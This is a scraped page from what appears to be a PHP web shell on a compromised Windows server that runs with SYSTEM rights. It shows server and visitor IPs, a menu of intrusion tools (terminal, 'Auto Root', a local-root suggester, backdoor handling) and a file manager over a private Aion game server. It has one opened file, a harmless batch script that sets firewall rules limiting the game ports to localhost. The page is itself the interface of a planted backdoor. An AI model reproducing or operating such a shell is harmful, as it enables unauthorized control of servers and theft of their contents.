Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.84
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
Servidor Aion - OLD CLASS /
Delete
Unzip
Name
Size
Permission
Date
Action
BACKUP COMMANDS PLAYER
[ DIR ]
drwxrwxrwx
2025-06-04 14:54
SRC Vortex Aion - Atualizado em 02 Fevereiro as 05AM
[ DIR ]
drwxrwxrwx
2025-06-04 14:54
Tabelas Custom SQL + Emulador da VORTEX AION
[ DIR ]
drwxrwxrwx
2025-06-04 14:54
chat-server
[ DIR ]
drwxrwxrwx
2025-06-03 05:13
game-server
[ DIR ]
drwxrwxrwx
2025-06-04 14:54
login-server
[ DIR ]
drwxrwxrwx
2025-06-03 05:13
Aion Sys Editor.exe
3.32
MB
-rwxrwxrwx
2025-04-17 01:21
Bloqueio portas.bat
1.38
KB
-rwxrwxrwx
2025-05-03 20:12
Iniciar OldClassAion Server.bat
2.08
KB
-rwxrwxrwx
2025-04-30 20:20
OldClass-PathFinding-DinamicSimulator.html
59.46
KB
-rw-rw-rw-
2025-07-24 23:24
ShugoConsole.exe
4.62
MB
-rwxrwxrwx
2025-03-26 00:46
code.mp4
9.57
MB
-rw-rw-rw-
2025-07-31 05:34
prt_txt_structured_editable.py
8.72
KB
-rw-rw-rw-
2025-07-21 19:56
Save
Rename
@echo off REM -------------------------------------------------------- REM Block ports externally, only allow localhost (127.0.0.1) REM -------------------------------------------------------- set PORTS=10350 9031 9050 7787 7777 7788 2106 2107 2108 2109 2110 2111 2112 2113 2114 2115 for %%P in (%PORTS%) do ( echo Configurando porta %%P... REM 1) Allow inbound TCP from localhost netsh advfirewall firewall add rule ^ name="Allow_TCP_Localhost_%%P" ^ dir=in action=allow ^ protocol=TCP localport=%%P ^ remoteip=127.0.0.1 ^ enable=yes REM 2) Block inbound TCP from qualquer outro IP netsh advfirewall firewall add rule ^ name="Block_TCP_External_%%P" ^ dir=in action=block ^ protocol=TCP localport=%%P ^ remoteip=any ^ enable=yes REM (Opcional) Repita para UDP, caso queira bloquear serviços UDP também netsh advfirewall firewall add rule ^ name="Allow_UDP_Localhost_%%P" ^ dir=in action=allow ^ protocol=UDP localport=%%P ^ remoteip=127.0.0.1 ^ enable=yes netsh advfirewall firewall add rule ^ name="Block_UDP_External_%%P" ^ dir=in action=block ^ protocol=UDP localport=%%P ^ remoteip=any ^ enable=yes ) echo. echo Todas as regras foram criadas com sucesso. pause